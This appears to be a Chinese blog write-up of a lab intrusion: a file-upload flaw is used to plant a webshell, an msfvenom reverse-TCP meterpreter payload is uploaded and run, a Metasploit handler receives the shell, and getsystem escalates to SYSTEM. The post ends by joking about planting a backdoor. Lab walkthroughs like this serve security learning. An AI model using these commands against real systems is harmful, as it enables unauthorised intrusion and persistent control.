记一次网站攻击到提权的全部过程

准备

靶机:win10系统(被攻击方)

入侵者:win10系统,kali系统

首先启动win10系统,搭建一个存在漏洞的网站,这里就继续用以前搭建好的网站,映射到局域网,使我们能够正常访问。

在此站点中拿到webshell

文件上传漏洞 

1.选择工具----附件分类管理

2.选择创建资源分类 

(添加支持的附件类型.php) 

 3.选择文件资源管理,并上传文件。

4.文件上传成功,且目录中存在shell文件

 5.使用蚁剑或者菜刀连接

到此,成功连接,拿到webshell 

反弹shell连接

kali制作exe反弹木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f exe -o 123.exe

 

木马上传 

讲做好的exe木马通过连接的webshell进行上传。

上传成功

启动kali中的msf

执行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.52.130
set lport 4444
exploit

 

运行木马

msf开启监听之后,去蚁剑webshell中执行上传的木马。

运行成功后,回到kali中的msf回连成功,创建会话。

 提权

查看所拥有的用户权限

为普通用户权限,在之前的蚁剑中已经知道对方是win10系统,采用windows的载荷攻击

用getsystem提权

直接提权成功

功能测试

查看系统信息

拍照对方电脑桌面状态

结语 

至此,成功拿到system权限,可以干很多很多事情.....当然是首先留后门了!哈哈哈.......

  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值